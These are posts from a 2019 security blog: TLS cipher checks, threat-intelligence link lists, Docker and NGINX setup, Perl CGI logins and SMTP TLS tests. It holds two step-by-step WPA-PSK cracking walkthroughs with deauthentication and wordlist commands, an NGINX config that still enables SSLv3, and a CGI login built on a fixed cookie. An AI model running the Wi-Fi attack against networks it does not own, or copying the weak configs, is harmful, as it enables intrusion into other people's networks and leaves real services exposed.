Friday, December 27, 2019
Check if an HTTPS service has any vulnerability in its cipher suites
#nmap -Pn --script ssl-enum-ciphers -p 443 IP_ADDRESS/HOSTNAME
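The command above lists, per protocol version, every cipher the server accepts with a letter grade plus any warnings, and the next thing a practitioner wants is an automatic verdict over that output. The following Python script is an added example, not part of the original post: it parses ssl-enum-ciphers output and flags deprecated protocol versions, ciphers graded below A, ciphers without forward secrecy, and the warnings nmap itself prints. The embedded sample output is constructed to match nmap's format and is not a real scan result; pipe saved nmap output into the script to assess a real host.

```python
import re
import sys

# Constructed sample of "nmap --script ssl-enum-ciphers" output for illustration;
# not the result of a real scan.
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   TLSv1.0:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C
|     compressors:
|       NULL
|     cipher preference: server
|     warnings:
|       64-bit block cipher 3DES vulnerable to SWEET32 attack
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
|       TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A
|     compressors:
|       NULL
|     cipher preference: server
|_  least strength: C
"""

DEPRECATED_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
FORWARD_SECRECY_PREFIXES = ("TLS_ECDHE_", "TLS_DHE_")

# nmap indents protocol headers by 3 spaces and cipher/warning lines by 7.
PROTO_RE = re.compile(r"^\|   (SSLv\d|TLSv1\.\d):\s*$")
CIPHER_RE = re.compile(r"^\|       (TLS_[A-Z0-9_]+)(?: \(([^)]*)\))? - ([A-F])\s*$")
WARNING_RE = re.compile(r"^\|       (\S.*?)\s*$")


def parse_ssl_enum_ciphers(text):
    """Map each protocol version to its ciphers [(name, key_exchange, grade)] and warnings."""
    parsed = {}
    proto = None
    section = None
    for line in text.splitlines():
        m = PROTO_RE.match(line)
        if m:
            proto = m.group(1)
            parsed[proto] = {"ciphers": [], "warnings": []}
            section = None
            continue
        if proto is None:
            continue
        label = line.lstrip("|_ ").rstrip()
        if label in ("ciphers:", "compressors:", "warnings:"):
            section = label[:-1]
            continue
        if section == "ciphers":
            m = CIPHER_RE.match(line)
            if m:
                parsed[proto]["ciphers"].append((m.group(1), m.group(2) or "", m.group(3)))
        elif section == "warnings":
            m = WARNING_RE.match(line)
            if m:
                parsed[proto]["warnings"].append(m.group(1))
    return parsed


def assess(parsed):
    """Turn the parsed scan into a list of findings; an empty list means nothing was flagged."""
    findings = []
    for proto, info in parsed.items():
        if proto in DEPRECATED_PROTOCOLS:
            findings.append(f"{proto}: deprecated protocol version offered")
        for name, _kex, grade in info["ciphers"]:
            if grade != "A":
                findings.append(f"{proto}: {name} graded {grade}")
            if not name.startswith(FORWARD_SECRECY_PREFIXES):
                findings.append(f"{proto}: {name} offers no forward secrecy")
        for warning in info["warnings"]:
            findings.append(f"{proto}: {warning}")
    return findings


if __name__ == "__main__":
    # Pipe saved nmap output in, or run with no input to assess the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NMAP_OUTPUT
    for finding in assess(parse_ssl_enum_ciphers(text)) or ["no findings"]:
        print(finding)
```

The same check applies to any TLS endpoint you operate, including a reverse proxy you terminate TLS on yourself: run the nmap command against it after deployment and feed the output through the script.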
Thursday, December 26, 2019
Online Malware Analysis Resource updated on 20191226
Sandbox:
https://malwareanalyser.io/
https://www.hybrid-analysis.com/
https://malware.sekoia.fr/new
https://s.threatbook.cn/
Multi-Scan:
https://www.virustotal.com/
https://metadefender.opswat.com/
Office Files Scan:
https://labs.inquest.net/dfi
PCAP Scan:
https://www.networktotal.com/index.html
Web Service Preview:
https://urlscan.io/
Web Service Risk Assessment:
https://zulu.zscaler.com/
https://www.ssllabs.com/
Black List Lookup:
https://talosintelligence.com/
SPAM Lookup:
https://www.spamhaus.org/lookup/
Monday, December 23, 2019
The ngrep command turns a NIDS into a NIPS
1) Once the source sending out malicious packets has been confirmed, use the ngrep command:
#ngrep -d any -q -K 10 host 192.168.1.10
#ngrep -d any -q -K 10 port 8080
#ngrep -d any -q -K 10 host 192.168.1.10 and port 22
2) If a malicious snippet of those malicious packets has been identified, leverage the ngrep command:
#ngrep -d wlan0 -q -K 10 "^GET .* HTTP/1.[01]" "host www.google.es"
#ngrep -d any -q -K 10 "abcd" icmp
Bear in mind that -d is followed by the network interface, and -K is followed by the number of RST packets that will be sent to terminate each matching TCP connection. -q runs ngrep in quiet mode, so only the matched packet headers and payloads are printed.
Utilize several commands to pinpoint DDoS in Linux environments
1) First leverage the ifstat command to confirm the presence of DDoS:
#ifstat
OR
#ifstat -i INTERFACE
2) Then utilize either the iftop or iptraf to uncover the service under the attack:
#iftop -i INTERFACE
OR
#iptraf -i INTERFACE
3) If this is a client PC, leverage the nethogs command to determine which process is occupying the bandwidth:
#nethogs INTERFACE
Friday, December 20, 2019
Install Open Source Intelligence (OSINT) Framework through Docker
1) Install and run OSINT-Framework:
#/etc/init.d/docker start
#docker pull pierlo1/osint-framework:latest
#docker run --rm -i -t -p 8080:8080 pierlo1/osint-framework
2) Use a browser to open http://127.0.0.1:8080/
Web-to-Onion Proxies
There is a way to explore the hidden services residing in the Tor network (Dark Web / Deep Web), and it is:
tor2web (https://www.tor2web.org/) :
Add the top level domain, ".to", at the end of the onion pseudo URL.
Tuesday, December 10, 2019
Requirement Specification of Endpoint Response Tool
1) Information Gathering
- Read Process List
- Read Details of each process
- Read "netstat -anb" information
2) Infected Endpoint Control
- Execute commands on endpoints
- Upload/Download files between endpoints and controllers
- Capture packets on endpoints
3) Security Detection Enhancement
- Built-in Malicious Code feeds that can be updated automatically
- Upload suspicious files to an on premise sandbox to analyze
- Import YARA rules
- Import Snort rules
4) Incident Response
- Block processes from sending packets
- Stop processes
- Clean / Delete infected files
- Isolate machines
5) Threat Intelligence Integration
- Asset Information Management
- Built-in Threat Intelligence feeds that can be updated automatically
- Sending alerts to SIEM through Syslog
6) Constraint
- Being able to coexist with such Antivirus as Symantec SEP
Decision Tree by Scikit-learn
#!/usr/bin/python3
#Reference #1: http://benalexkeen.com/decision-tree-classifier-in-python-using-scikit-learn/
#Reference #2: https://www.datacamp.com/community/tutorials/decision-tree-classification-python
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import tree
from sklearn.tree import export_text
from sklearn.metrics import accuracy_score
#One alert per row, indexed by the "No." column.
df = pd.read_csv('./alert_fast2.csv', index_col='No.')
print("Dataset Size : ", df.shape)
print(df.head(10))
#We will be using Threat, Category, Proto, Src_ip, Src_port, Dst_ip, and Dst_port to predict the Result.
#Failed: Category, Src_ip, and Dst_ip are not integer values.
#df = df[['Threat', 'Category', 'Proto', 'Src_ip', 'Src_port', 'Dst_ip', 'Dst_port', 'Result']]
df = df[['Proto', 'Src_port', 'Dst_port', 'Result']].copy()
#We need to convert those strings into integer values.
df['Result'] = df['Result'].map({'yes': 1, 'no': 0})
df['Proto'] = df['Proto'].map({'TCP': 1, 'UDP': 2, 'ICMP': 3, 'IP': 4})
#Drop any rows with missing values (this also drops rows whose Proto or Result had no mapping above).
df = df.dropna()
X = df.drop('Result', axis=1)
y = df['Result'].astype(int)
#Hold out a quarter of the alerts (the default test_size) for evaluation.
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)
model = tree.DecisionTreeClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test)
print("Accuracy : ", accuracy_score(y_test, y_predict))
# Making a Prediction On a New Sample: columns are [Proto, Src_port, Dst_port], so 1 means TCP.
new_samples = pd.DataFrame([[1, 1043, 80], [1, 1041, 80]], columns=X.columns)
sample_one_pred, sample_two_pred = (int(v) for v in model.predict(new_samples))
print("Sample_one_pred : ", sample_one_pred)
print("Sample_two_pred : ", sample_two_pred)
#Print out the tree (export_text lives in sklearn.tree since scikit-learn 0.21).
print(export_text(model, feature_names=list(X.columns)))
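The script above had to drop Threat, Category, Src_ip and Dst_ip because a decision tree only accepts numeric features, which is what the "Failed" comment records. The following Python is an added example, not code from the post: it encodes those columns so they can be kept, turning each IP address into an integer (so that tree splits approximate address ranges) plus a private-range flag, and expanding the unordered Category label into one indicator column per value. The rows are constructed in the same column layout as alert_fast2.csv with invented values; the returned X and y can be passed straight to DecisionTreeClassifier.fit as in the post. It uses only the standard library.

```python
import ipaddress

# Same mappings as the post uses for Proto and Result.
PROTO_MAP = {"TCP": 1, "UDP": 2, "ICMP": 3, "IP": 4}
RESULT_MAP = {"yes": 1, "no": 0}

# Constructed rows in the column layout of the post's alert_fast2.csv; the values
# are invented for illustration and "Result" is the analyst's verdict.
SAMPLE_ALERTS = [
    {"Threat": "SCAN probe", "Category": "Attempted Information Leak", "Proto": "TCP",
     "Src_ip": "10.0.0.5", "Src_port": "1043", "Dst_ip": "192.168.1.10", "Dst_port": "80", "Result": "yes"},
    {"Threat": "DNS oddity", "Category": "Potentially Bad Traffic", "Proto": "UDP",
     "Src_ip": "10.0.0.7", "Src_port": "53210", "Dst_ip": "192.168.1.1", "Dst_port": "53", "Result": "no"},
    {"Threat": "SSH brute force", "Category": "Attempted Administrator Privilege Gain", "Proto": "TCP",
     "Src_ip": "203.0.113.7", "Src_port": "4444", "Dst_ip": "192.168.1.10", "Dst_port": "22", "Result": "yes"},
    {"Threat": "ICMP ping", "Category": "Misc activity", "Proto": "ICMP",
     "Src_ip": "10.0.0.9", "Src_port": "0", "Dst_ip": "192.168.1.10", "Dst_port": "0", "Result": "no"},
    # Proto has no mapping, so this row is dropped, just as dropna() drops it in the post.
    {"Threat": "GRE tunnel", "Category": "Misc activity", "Proto": "GRE",
     "Src_ip": "10.0.0.11", "Src_port": "0", "Dst_ip": "192.168.1.10", "Dst_port": "0", "Result": "yes"},
]


def ip_features(ip_text):
    """An address as an integer (so tree splits approximate prefix ranges) plus a private-range flag."""
    ip = ipaddress.ip_address(ip_text)
    return [int(ip), int(ip.is_private)]


def encode_alerts(rows):
    """Return (feature_names, X, y) with every feature numeric, ready for DecisionTreeClassifier.fit."""
    categories = sorted({row["Category"] for row in rows})
    feature_names = ["Proto", "Src_ip_int", "Src_private", "Src_port",
                     "Dst_ip_int", "Dst_private", "Dst_port"]
    # Category is an unordered label, so it becomes one indicator column per value
    # rather than an arbitrary integer that the tree would treat as ordered.
    feature_names += [f"Category={c}" for c in categories]
    X, y = [], []
    for row in rows:
        if row["Proto"] not in PROTO_MAP or row["Result"] not in RESULT_MAP:
            continue
        features = [PROTO_MAP[row["Proto"]]]
        features += ip_features(row["Src_ip"]) + [int(row["Src_port"])]
        features += ip_features(row["Dst_ip"]) + [int(row["Dst_port"])]
        features += [int(row["Category"] == c) for c in categories]
        X.append(features)
        y.append(RESULT_MAP[row["Result"]])
    return feature_names, X, y


if __name__ == "__main__":
    names, X, y = encode_alerts(SAMPLE_ALERTS)
    print(names)
    for features, label in zip(X, y):
        print(features, "->", label)
```

The Threat column (the rule message) is free text; if it is to be used at all it should be reduced to a small vocabulary or a rule identifier first, otherwise the tree simply memorises one leaf per message.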
Tuesday, December 3, 2019
Deploy SSL Offloading Reverse Proxy through Docker and NGINX
References:
1)https://docs.nginx.com/nginx/admin-guide/web-server/reverse-proxy/
2)https://docs.nginx.com/nginx/admin-guide/security-controls/terminating-ssl-http/?_ga=2.180791975.1262112524.1575417960-988469526.1575417960
Test the NGINX docker image:
#/etc/init.d/docker start
#docker pull nginx
#docker run -it nginx /bin/bash
Install essential software:
docker#apt-get update ; apt-get install net-tools vim openssl file
Generate SSL certificate and the key:
docker#openssl req -newkey rsa:2048 -nodes -keyout /etc/ssl/certs/key.pem -x509 -days 365 -out /etc/ssl/certs/certificate.pem
Modify the nginx.conf file:
docker#cd /etc/nginx
docker#cp ./nginx.conf ./nginx.conf.bak
docker#vi ./nginx.conf
Change the content of the nginx.conf to the content as follows:
---------------------------
user nginx;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
stream {
upstream stream_backend {
server 8.8.8.8:81;
}
server {
listen 443 ssl;
proxy_pass stream_backend;
ssl_certificate /etc/ssl/certs/certificate.pem;
ssl_certificate_key /etc/ssl/certs/key.pem;
# SSLv3, TLSv1 and TLSv1.1 are deprecated; keep only TLSv1.2 (and TLSv1.3 where the build supports it) unless a legacy client requires the older versions.
ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_session_cache shared:SSL:20m;
ssl_session_timeout 4h;
ssl_handshake_timeout 30s;
}
}
---------------------------
:wq!
docker#/etc/init.d/nginx start
Create a new docker image:
#docker commit [CONTAINER ID] demonalex/nginx
Sunday, December 1, 2019
Quick Set up NGINX with Modsecurity through Docker
Reference: https://hub.docker.com/r/owasp/modsecurity-crs
1) Pull the docker image first:
#/etc/init.d/docker start
#docker pull owasp/modsecurity-crs
2) Suppose Apache2 is running on TCP port 81 of the server; start it with:
#/etc/init.d/apache2 start
3) Run the image:
#docker run -d -p 80:80 -e PARANOIA=5 -e PROXY=1 -e PROXYLOCATION=[URL] owasp/modsecurity-crs
Example:
#docker run -d -p 80:80 -e PARANOIA=5 -e PROXY=1 -e PROXYLOCATION=http://8.8.8.8:81/ owasp/modsecurity-crs
4) Check Modsecurity's log:
#docker exec -it [CONTAINER NAME] tail -n 30 -f /var/log/modsec_audit.log
Example:
#docker exec -it sweet_swartz tail -n 30 -f /var/log/modsec_audit.log
Tuesday, November 19, 2019
Create a Docker image by modifying existing images
There are two ways to create a new Docker image, and they are shown below:
- Create images by modifying existing images
- Create images by utilizing Dockerfiles
This document is to demonstrate how to create images by modifying existing images (P.S.: The following example shows how to modify an existing image named httpd and save it as a new image named demonalex/httpd:2)
#systemctl start docker
#docker run -it httpd /bin/bash
After modifying the image, execute the following commands:
#docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
884fa8ecd4bd httpd "/bin/bash" 8 minutes ago Up 8 minutes 80/tcp hardcore_aryabhata
#docker commit 884fa8ecd4bd demonalex/httpd:2
#docker images|grep httpd
demonalex/httpd 2 a6a8c482adec 41 seconds ago 205MB
httpd latest 19459a872194 2 months ago 154MB
#docker run -it demonalex/httpd:2 /bin/bash
Sunday, November 17, 2019
Docker File Import and Export
Export Image:
#docker save [OPTIONS] IMAGE [IMAGE...]
Example:
#docker save busybox > busybox.tar
Import Image:
#docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]
Example:
#docker import /path/to/exampleimage.tgz
Load Image from Files:
#docker load [OPTIONS]
Example:
#docker load < busybox.tar.gz
Installing KVM at Kali Linux
#apt-get update
#apt install -y qemu-kvm libvirt0 virt-manager libguestfs-tools bridge-utils
#mkdir -p /var/lib/libvirt/iso
#cp ~/Downloads/*.iso /var/lib/libvirt/iso
#virt-manager
Sunday, October 27, 2019
[eJPT][spider]A simple web crawler/spider
#mkdir -p /tmp/test1
#cd /tmp/test1
#wget -r -l 5 http://URL/index.html; grep -nR -i keyword URL | tee ./report.txt
Friday, October 25, 2019
cgi_login3.pl
#!/usr/bin/perl -wT
use strict;
use CGI qw(:standard);
# Static credentials; the session cookie is derived from them, so it is the same
# value for every login and stays valid until the salt or the credentials change.
my $username='test1';
my $password='test2';
my $salt='173173';
my $string=$username.$password;
# crypt() takes the plaintext first and the salt second; cgi_login2.pl must compute the same value.
my $digest=crypt($string,$salt);
my $the_cookie = cookie('test');
if(!defined($the_cookie) || $the_cookie ne $digest){
print "Content-type: text/html\n\n";
print "<script>alert('You are not allowed to access this page!')</script>";
print "<script>window.history.back()</script>";
}else{
print "Content-type: text/html\n\n";
print start_html("Authenticated");
print <<EOF;
You have successfully logged into the system!<br>
EOF
print end_html;
}
cgi_login2.pl
#!/usr/bin/perl -wT
use strict;
use CGI qw(:standard);
my $username='test1';
my $password='test2';
my $salt='173173';
my $string=$username.$password;
# Must match the digest computed in cgi_login3.pl: plaintext first, salt second.
my $digest=crypt($string,$salt);
my $user = param('username');
my $pass = param('password');
if(defined($user) && defined($pass) && ($user eq $username) && ($pass eq $password)){
my $cookie = cookie(-name => 'test', -value => "$digest");
print redirect(-url => 'cgi_login3.pl', -cookie => $cookie);
}elsif(defined($user) || defined($pass)){
print "Content-type: text/html\n\n";
print "<script>alert('The username or password is wrong!')</script>";
print "<script>window.history.back()</script>";
}else{
# Reached when the form was not submitted at all: nothing to do.
;
}
cgi_login1.pl
#!/usr/bin/perl -wT
use CGI qw(:standard);
print header;
print start_html("Login");
print <<EndHTML;
<form action="cgi_login2.pl" method="POST">
Please enter your login name and password.<br>
username: <input type="text" name="username" size=10><br>
password: <input type="password" name="password" size=10><p>
Be sure you have cookies turned on in your browser.<p>
<input type="submit" value="Log In">
</form>
EndHTML
print end_html;
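The three scripts above form one login flow, and two things in it are worth seeing done differently: the cookie is a single fixed digest derived from the static credentials, so it never changes, never expires, and anyone who sees it once holds it forever; and both the password and the cookie are checked with plain string comparison. The following is an added example in Python, not the post's Perl and not a drop-in replacement for it: it stores a salted PBKDF2 hash instead of the plaintext password, issues a random per-session identifier kept server-side, signs it with an HMAC so a tampered cookie is rejected before any lookup, compares everything in constant time, and expires sessions. The secret key is generated per process here, which is an assumption for the example; a real CGI deployment loads it from configuration so every invocation shares it.

```python
import hashlib
import hmac
import secrets
import time

# Key for signing cookies. Generated per process here (example assumption); a real
# deployment loads it from configuration so every CGI invocation uses the same key.
SECRET_KEY = secrets.token_bytes(32)
SESSION_TTL_SECONDS = 3600
COOKIE_NAME = "test"  # the cookie name the post's scripts use


def _hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256; the stored value reveals nothing usable if the script leaks."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


# The same demo credentials as the post (test1 / test2), but only the hash is kept.
_SALT = secrets.token_bytes(16)
USERS = {"test1": (_SALT, _hash_password("test2", _SALT))}

# Server-side session store: session id -> (username, expiry timestamp).
_SESSIONS = {}


def verify_login(username, password):
    """Constant-time password check; unknown users take the same code path as wrong passwords."""
    salt, stored = USERS.get(username, (b"\x00" * 16, b"\x00" * 32))
    return hmac.compare_digest(_hash_password(password, salt), stored) and username in USERS


def _sign(session_id):
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def issue_session(username, now=None):
    """Create a fresh random session and return the cookie value to set."""
    now = time.time() if now is None else now
    session_id = secrets.token_urlsafe(32)
    _SESSIONS[session_id] = (username, now + SESSION_TTL_SECONDS)
    return f"{session_id}.{_sign(session_id)}"


def verify_session(cookie_value, now=None):
    """Return the logged-in username for a valid, unexpired cookie, otherwise None."""
    now = time.time() if now is None else now
    if not cookie_value or "." not in cookie_value:
        return None
    session_id, mac = cookie_value.rsplit(".", 1)
    # Reject forged or altered cookies before touching the session store.
    if not hmac.compare_digest(mac.encode(), _sign(session_id).encode()):
        return None
    entry = _SESSIONS.get(session_id)
    if entry is None:
        return None
    username, expiry = entry
    if now > expiry:
        _SESSIONS.pop(session_id, None)
        return None
    return username


def set_cookie_header(cookie_value):
    """Cookie attributes that keep the token away from page scripts and off plain HTTP."""
    return (f"Set-Cookie: {COOKIE_NAME}={cookie_value}; Path=/cgi-bin/; "
            "HttpOnly; Secure; SameSite=Strict")


if __name__ == "__main__":
    if verify_login("test1", "test2"):
        cookie = issue_session("test1")
        print(set_cookie_header(cookie))
        print("cookie verifies as:", verify_session(cookie))
```

In the CGI flow, cgi_login2.pl would call verify_login and emit set_cookie_header on success, and cgi_login3.pl would call verify_session on the incoming cookie instead of comparing it against a constant.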
Sunday, October 20, 2019
Enable Perl-CGI at Apache2
Enable CGI:
#ln -s /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf
#ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
Add a CGI script:
#touch /usr/lib/cgi-bin/test.pl
#vi /usr/lib/cgi-bin/test.pl
-----------------------------
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "Testing";
-----------------------------
:wq!
#cd /usr/lib
#chmod -R +x ./cgi-bin
Restart Apache2:
#systemctl restart apache2.service
Verify:
Access http://127.0.0.1/cgi-bin/test.pl
Sunday, October 6, 2019
Install Docker in Kali Linux
References:
https://www.runoob.com/docker/docker-tutorial.html
Installation:
#curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
#echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
#apt-get update
#apt-get remove docker docker-engine docker.io
#apt-get install docker-ce
Testing:
#docker run hello-world
Start and Enable Docker:
#systemctl enable docker
#systemctl start docker
Search and Pull a docker:
#docker search apache
#docker pull httpd
Show installed images:
#docker images
Run a docker: (P.S.: "-d" represents running in the background, and "-P" represents Transport-Layer Port Mapping)
#docker run -d -P httpd
And the mapped Transport-Layer port can be specified:
#docker run -d -p 8443:443 httpd
The command above maps the docker's TCP443 to the host machine's TCP8443.
Run a docker in a shell:
#docker run -t -i IMAGE_NAME /bin/bash
Such as:
#docker run -t -i metasploitframework/metasploit-framework /bin/bash
Enter a running docker with a shell:
#docker exec -t -i CONTAINER_ID /bin/bash
Such as:
#docker exec -t -i b936b0afeb23 /bin/bash
Show what dockers are running:
#docker ps
Show Transport-Layer ports related to the docker:
#docker port CONTAINER_ID
Such as:
#docker port b936b0afeb23
Show logs generated by the docker:
#docker logs -f CONTAINER_ID
Such as:
#docker logs -f b936b0afeb23
Check the performance of the docker:
#docker top CONTAINER_ID
Such as:
#docker top b936b0afeb23
Show the details of the docker:
#docker inspect CONTAINER_ID
Such as:
#docker inspect b936b0afeb23
Stop a docker:
#docker stop CONTAINER_ID
Such as:
#docker stop b936b0afeb23
Delete a docker image:
#docker rmi -f httpd
Monday, September 23, 2019
Monday, August 19, 2019
[Threat Intelligence] Check if already hacked
https://haveibeenpwned.com/PwnedWebsites
https://hacked-emails.com/confirmed/
https://hacked-emails.com/latest/
[Threat Intelligence] Third Party Web Security Scan
https://sitecheck.sucuri.net/
https://tools.geekflare.com/toolbox
https://observatory.mozilla.org/
Sunday, August 4, 2019
[Threat Intelligence] Manufacturers
FireEye
Carbon Black
Crowdstrike
RecordFuture
Anomali
LookingGlass
IBM X-Force Exchange
BLUEVOYANT
Cisco Talos
ZeroFox
Digital Shadow
[Threat Intelligence] Tor Service Searching
https://ahmia.fi/
http://onion.link/
http://www.tor2web.org
Wednesday, July 17, 2019
[Threat Intelligence] Relevant Models
3-Triple model
Cyber Kill Chain model
Diamond model
F3EAD cycle model
Tuesday, July 2, 2019
[Threat Intelligence] Passive Vulnerability Detectors
shodan (https://www.shodan.io/)
zoomeye (https://www.zoomeye.org/)
censys (https://censys.io/)
securityrating (https://www.securityrating.io/)
FOFA (https://fofa.so/)
Thursday, June 20, 2019
[Threat Intelligence] Three more lookup items that should be checked for Threat Intelligence
1) Brand Protection & Monitoring
Periodically determine if there is any malicious website faking the company to conduct phishing activities.
Search Engines: Google, Bing, and Yahoo
Checklist:
1.1) Check if there are any websites using similar top-level domain names to fake the company.
1.2) Check whether there are any other websites faking the company in the Internet.
2) Passive Internet-faced Vulnerability Lookup
Regularly look up these cyberspace search engines in order to discover Internet-facing vulnerabilities associated with the company.
Search Engines: Shodan (shodan.io) and ZoomEye (zoomeye.org)
Checklist:
2.1) Search keywords “XXXX” and “XXXX”, respectively.
2.2) Check if there is any vulnerability linked to the aforementioned two domains.
3) Internet Asset Blacklist/Reputation Checking
Periodically check if the company's domains are sitting in SPAM/Reputational Blacklists.
Search Engines: VirusTotal (https://www.virustotal.com/gui/home/url) and Talos Intelligence (https://www.talosintelligence.com/reputation_center/)
Friday, June 14, 2019
[Threat Intelligence] Five famous Dark Web search engines
torch xmh57jrzrnw6insl.onion
Ahmia msydqstlz2kzerdg.onion
candle gjobqjj7wyczbqie.onion
not Evil hss3uro2hsxfogfq.onion
haystak haystakvxad7wbk5.onion
onionland 3bbaaaccczcbdddz.onion
Crack WPA-PSK with Kali [Plan B]
1):
airmon-ng
2)Start Monitoring mode:
airmon-ng start wlan0
3):
airodump-ng wlan0mon
4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon
5)Launch Deauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon
6)Stop Monitoring mode:
airmon-ng stop wlan0mon
7):
aircrack-ng CAP_FILE_PATH -J john
8):
hccap2john john.hccap > wpa
9):
john --wordlist=/usr/share/wordlists/rockyou.txt ./wpa
Crack WPA-PSK with Kali
1):
airmon-ng
2)Start Monitoring mode:
airmon-ng start wlan0
3):
airodump-ng wlan0mon
4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon
5)Launch Deauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon
6)Stop Monitoring mode:
airmon-ng stop wlan0mon
7)Go to https://hashcat.net/cap2hccapx/ and upload the PCAP in order to have the HCCAPX file.
8):
hashcat -m 2500 -a 0 HCCAPX_FILE_PATH /usr/share/wordlists/rockyou.txt --force
Saturday, June 1, 2019
Wednesday, May 29, 2019
Some websites for checking HTTPS, SMTP over TLS, and SMTP.
Check HTTPS:
https://www.ssllabs.com/
Check SMTP over TLS:
https://www.checktls.com/
Check SMTP:
https://www.wormly.com/test-smtp-server
Wednesday, May 1, 2019
A Perl script to verify if your SMTP server has enabled SMTP over TLS.
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
$|=1;
if(($#ARGV + 1 ) != 2){
die "Usage: $0 host_ip smtp_port\n";
}
my $host_ip=shift;
my $smtp_port=shift;
my $sock=IO::Socket::INET->new(PeerAddr => "$host_ip:$smtp_port", Timeout => 5) || die "$host_ip:$smtp_port is closed!\n";
# Read the 220 greeting, then ask for the ESMTP extension list.
my $banner;
$sock->recv($banner, 1000, 0);
$sock->send("EHLO test.com\r\n");
# A single recv() may return only part of a multi-line reply; 5000 bytes covers typical servers.
my $ehlo_reply;
$sock->recv($ehlo_reply, 5000, 0);
$sock->shutdown(2);
# A server that supports STARTTLS advertises it as one of the 250- continuation lines.
if(lc($ehlo_reply)=~m/starttls/){
print "$host_ip:$smtp_port supports SMTP over TLS!\n";
exit(0);
}else{
print "$host_ip:$smtp_port does not support SMTP over TLS!\n";
exit(1);
}
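The Perl script above only checks that the word STARTTLS appears in the EHLO reply; it does not confirm that the upgrade actually succeeds or that the certificate is valid, and a single recv() can return a partial reply. The following is an added example in Python, not the post's script: it reads complete multi-line SMTP replies, parses the advertised ESMTP extensions properly, and when STARTTLS is offered completes the TLS handshake with certificate verification and reports the negotiated version. The helo_name and the sample EHLO reply used to exercise the parser are constructed for the example.

```python
import socket
import ssl
import sys


def read_reply(sock):
    """Read one SMTP reply, including all 250- continuation lines, until the final 'NNN ' line."""
    data = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
        if data.endswith(b"\r\n"):
            last_line = data[:-2].rsplit(b"\r\n", 1)[-1]
            # The last line of a reply has a space (not a dash) after the three-digit code.
            if last_line[:3].isdigit() and last_line[3:4] == b" ":
                break
    return data.decode("ascii", errors="replace")


def parse_ehlo_extensions(reply_text):
    """Map each advertised ESMTP keyword (upper-case) to its parameters; the first line is the greeting."""
    extensions = {}
    lines = [line for line in reply_text.replace("\r\n", "\n").split("\n") if line]
    for line in lines[1:]:
        if not line.startswith("250") or len(line) < 5:
            continue
        keyword, _, params = line[4:].strip().partition(" ")
        if keyword:
            extensions[keyword.upper()] = params
    return extensions


def check_starttls(host, port, helo_name="test.com", timeout=5):
    """Live check: EHLO, and if STARTTLS is advertised, complete the handshake with certificate verification."""
    report = {"advertised": False, "negotiated": False, "tls_version": None, "error": None}
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            read_reply(sock)  # 220 greeting
            sock.sendall(f"EHLO {helo_name}\r\n".encode())
            report["advertised"] = "STARTTLS" in parse_ehlo_extensions(read_reply(sock))
            if not report["advertised"]:
                return report
            sock.sendall(b"STARTTLS\r\n")
            if not read_reply(sock).startswith("220"):
                report["error"] = "server refused STARTTLS"
                return report
            # Pass the mail server's hostname (not an IP) so the certificate's name is verified too.
            context = ssl.create_default_context()
            with context.wrap_socket(sock, server_hostname=host) as tls:
                report["negotiated"] = True
                report["tls_version"] = tls.version()
                tls.sendall(b"QUIT\r\n")
    except (OSError, ssl.SSLError) as exc:
        report["error"] = str(exc)
    return report


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"Usage: {sys.argv[0]} host smtp_port")
    print(check_starttls(sys.argv[1], int(sys.argv[2])))
```

A server that advertises STARTTLS but fails the handshake with an error such as a certificate verification failure is reported with advertised=True and negotiated=False, which is the case the Perl script would have counted as "supports SMTP over TLS".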
Tuesday, April 30, 2019
Disable vulnerable Windows 7/10 system services for system hardening
Sources:
https://hardenwindows10forsecurity.com/
https://hardenwindows7forsecurity.com/Harden%20Windows%207%20Home%20Premium%2064bit%20-%20Standalone.html
Windows 10:
AllJoyn router service (manual) not used by me
AVCTP service (manual) related to bluetooth audio and video, not used by me
bluetooth handsfree service:(manual) not used by me.
bluetooth support service:(manual) not used by me.
Certificate propagation (manual) smart card related. not used by me.
Data Usage (automatic) phone related
Enterprise App Management Service (manual) not used by me
fax:(manual) not used by me
HV Host Service (manual) virtualization, not used by me
Hyper-V ... all 8 services (manual) virtualization. not used by me
Microsoft Account Sign in Assistant (manual) MS Accounts not used by me, NEEDED only for activation.
Microsoft iSCSI initiator service:(manual) not used by me
Network Connection Broker (manual) used by Windows Store, not used by me
